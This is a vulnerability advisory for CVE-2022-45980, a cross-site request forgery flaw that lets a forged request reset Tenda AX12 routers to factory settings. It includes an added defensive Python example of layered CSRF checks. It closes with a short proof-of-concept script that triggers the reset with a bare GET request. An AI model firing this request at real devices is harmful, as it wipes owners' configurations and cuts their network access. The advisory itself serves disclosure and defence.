
CVE-2022-45980: IOT-CVE/Tenda/AX12/6 at master · The-Itach1/IOT-CVE

Tenda AX12 V22.03.01.21_CN was discovered to contain a Cross-Site Request Forgery (CSRF) via /goform/SysToolRestoreSet.

Tags: CVE, csrf, vulnerability, auth

Vulnerability description

Affected device: Tenda AX12 V22.03.01.21_CN (https://www.tenda.com.cn/download/detail-3237.html)

Vulnerability Type: Cross Site Request Forgery (CSRF)

Impact: Device reset to factory settings

Vulnerability cause

The /goform/SysToolRestoreSet endpoint, once the user's browser holds an authenticated session, allows a remote attacker to restore the device to factory settings: no additional confirmation or request-specific token is required beyond the session.
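A reset endpoint that accepts any authenticated request is the textbook CSRF shape. The following is an added example, not Tenda's firmware code or anything from the advisory, of the server-side check a state-changing endpoint like this one should perform: require POST, verify the request origin, and require a per-session synchronizer token. The origin value, secret and session id are constructed for illustration.

```python
import hashlib
import hmac
from typing import Mapping, Optional, Tuple
from urllib.parse import urlsplit

# Constructed: the origin of the router's own management UI. A real device
# would derive this from its configured management address.
ALLOWED_ORIGIN = "http://192.168.0.1"


def make_csrf_token(session_id: str, secret: bytes) -> str:
    """Derive a per-session synchronizer token as HMAC-SHA256(secret, session_id).

    The token is embedded in the management page's forms; a cross-site page
    cannot read it, so it cannot forge a request that carries it.
    """
    return hmac.new(secret, session_id.encode(), hashlib.sha256).hexdigest()


def _origin_of(headers: Mapping[str, str]) -> str:
    """Reduce the Origin (or, failing that, Referer) header to scheme://host[:port]."""
    raw = headers.get("Origin") or headers.get("Referer") or ""
    parts = urlsplit(raw)
    return f"{parts.scheme}://{parts.netloc}"


def is_safe_request(method: str, headers: Mapping[str, str], form: Mapping[str, str],
                    session_id: Optional[str], secret: bytes) -> Tuple[bool, str]:
    """Return (allowed, reason) for a request to a state-changing endpoint.

    Rejects, in order: missing session; any method other than POST (a GET that
    changes state can be triggered by a plain <img> or link); a request whose
    Origin/Referer is not the management UI; and a missing or wrong token.
    """
    if not session_id:
        return False, "unauthenticated"
    if method.upper() != "POST":
        return False, "state change must use POST"
    if _origin_of(headers) != ALLOWED_ORIGIN:
        return False, "cross-origin request"
    expected = make_csrf_token(session_id, secret)
    supplied = form.get("csrf_token", "")
    # Constant-time comparison so token checking does not leak via timing.
    if not hmac.compare_digest(expected, supplied):
        return False, "missing or invalid CSRF token"
    return True, "ok"


if __name__ == "__main__":
    secret = b"constructed-server-secret"   # constructed
    session = "session-1234"                # constructed
    token = make_csrf_token(session, secret)

    # The shape of the advisory's request: authenticated, but a bare GET.
    print(is_safe_request("GET", {}, {}, session, secret))
    # A forged POST from another site, even with a valid session cookie.
    print(is_safe_request("POST", {"Origin": "http://attacker.example"},
                          {"csrf_token": token}, session, secret))
    # A legitimate submission from the management UI.
    print(is_safe_request("POST", {"Origin": ALLOWED_ORIGIN},
                          {"csrf_token": token}, session, secret))
```

The Origin check alone is not sufficient (older clients omit Origin, and Referer can be suppressed), and the token alone does not stop a GET being triggered by an image tag; the three checks are layered deliberately.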

POC

Once the browser holds an authenticated session, simply requesting this endpoint is enough to trigger the reset.

import requests

# "ip" is the advisory's placeholder for the device's management address.
url = "http://ip/goform/SysToolRestoreSet"

# A plain GET with no parameters and no token is all the endpoint requires.
r = requests.get(url)

print(r.content)
